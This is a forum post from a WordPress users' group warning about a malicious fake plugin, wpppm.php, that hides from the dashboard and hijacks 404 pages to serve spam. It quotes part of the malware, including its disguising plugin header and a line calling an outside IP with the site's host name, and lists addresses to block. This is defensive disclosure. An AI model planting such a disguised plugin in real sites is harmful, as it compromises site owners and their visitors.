SoCal WordPress Users' Group Message Board › Watch out for malicious "plugin" wpppm

Watch out for malicious "plugin" wpppm

Todd Z
ToddZ
Encino, CA
Post #: 7
I just tracked this down in a client's site.

While no plugin shows in the admin dashboard, in the plugin dir there's a wpppm/wpppm.php file (and a related subdir filled with files with random hash filenames). The way it works is it overrides the normal 404 behavior of your site and serves up a spam ad page for any URL that isn't otherwise a valid page, like yoursite.com/sdlfkjsldfkjsdflkjsdfs

The file starts with:
/*
Plugin Name: Wordpress Plugin Manager
*/

function fourofour()
{

...
$u = "http://... 83.133.123.174/v.html?v=$ver&h="­ . urlencode($_SERVER['HTTP_HOST']);


(I "broke" the URL above so it wouldn't be a valid link)

So most people would think it's a standard WP file, but notice the name of the function: fourofour = 404

If you enter that url into your browser you get (at least I did) 91.207.60.62
and if you enter that into your browser you get the "HYDROXYCITRIC" spam page that will be injected into your site.

You might want to block those addresses in your firewall and search your servers for this wpppm.php.

After the fact found this article on it: http://blog.sucuri.ne...­

Interestingly, if you Google wpppm.php you'll find about 6,500 sites infected by this!

Good luck,
todd at toddzebert dot com
Powered by mvnForum

Our Sponsors

People in this
Meetup are also in:

Sign up

Meetup members, Log in

By clicking "Sign up" or "Sign up using Facebook", you confirm that you accept our Terms of Service & Privacy Policy